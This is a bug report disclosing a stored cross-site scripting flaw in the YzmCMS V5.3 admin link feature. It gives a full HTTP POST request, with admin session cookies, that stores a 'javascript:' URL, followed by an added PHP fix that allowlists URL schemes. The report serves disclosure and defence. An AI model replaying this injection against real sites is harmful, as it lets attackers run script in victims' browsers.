Cross Site Scripting Vulnerability in Latest Release V5.3
Hi, I would like to report a Cross Site Scripting vulnerability in the latest release.
Description:
Cross-site scripting (XSS) vulnerability in banner_list.html
Steps To Reproduce:
1. Log in to the admin system;
2. Create a new page
url: http://127.0.0.1/yzmcms/link/link/add.html
```http
POST http://127.0.0.1/yzmcms/link/link/add.html HTTP/1.1
Host: 127.0.0.1
Connection: keep-alive
Content-Length: 137
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Referer: http://127.0.0.1/yzmcms/link/link/add.html
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=32ac906cf4fd00f38d9fd891eeaa3c40; yzmphp_adminid=a4afUreJXZ4pZ5mTo0F3vxcDfFM6sJ0sYQel1-p3; yzmphp_adminname=b11bhadgtkARA-vRFm900d0gCKxmI4cIz75JmY-U-o9rsIs; yzmphp_catid=8e57881gPizoimKE-eME9mjZLBndVDbBZ_1YeKHo

name=%E7%99%BE%E5%BA%A6&url=javascript%3Aalert(%22xss%22)&username=&email=&linktype=0&logo=&typeid=0&msg=&listorder=1&status=1&dosubmit=1
```


3. Click link
Release Info:
V5.3
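
A server-side check that would reject the `url` value in the request above, as an added example that is not part of the original report and is not YzmCMS code. The function names are hypothetical, and it assumes the stored value ends up in an `href` attribute; it contrasts HTML-escaping alone with a scheme allowlist applied before escaping.

```php
<?php
// Added example: names are hypothetical, not taken from YzmCMS.

// Returns the URL if it is safe to use as an href, otherwise null.
function safe_link_url(string $raw): ?string
{
    // Browsers drop tab/CR/LF anywhere in a URL and skip leading control
    // characters and spaces, so normalise the same way before checking.
    $url = preg_replace('/[\t\r\n]/', '', $raw);
    $url = preg_replace('/^[\x00-\x20]+/', '', $url);

    // Require an explicit scheme and compare it against an allowlist.
    if (!preg_match('/^([a-z][a-z0-9+.-]*):/i', $url, $m)) {
        return null;
    }
    if (!in_array(strtolower($m[1]), ['http', 'https'], true)) {
        return null;
    }
    // An http(s) link without a host is not a usable external link.
    $host = parse_url($url, PHP_URL_HOST);
    return (is_string($host) && $host !== '') ? $url : null;
}

// Escaping alone: quotes become entities, but the scheme is untouched.
function render_escaped_only(string $name, string $url): string
{
    return sprintf('<a href="%s">%s</a>',
        htmlspecialchars($url, ENT_QUOTES, 'UTF-8'),
        htmlspecialchars($name, ENT_QUOTES, 'UTF-8'));
}

// Scheme allowlist first, then escaping for the attribute context.
function render_checked(string $name, string $url): string
{
    return render_escaped_only($name, safe_link_url($url) ?? '#');
}

// Constructed sample inputs; the second is the url value from the report.
$samples = [
    'https://www.baidu.com/',
    'javascript:alert("xss")',
    ' JAVASCRIPT:alert(1)',
    '//example.com/no-scheme',
];
foreach ($samples as $s) {
    echo render_escaped_only('link', $s), "\n";
    echo render_checked('link', $s), "\n\n";
}
```

The same `safe_link_url` check belongs on the write path (rejecting the POST) as well as at render time, so rows stored before the fix are still neutralised on output.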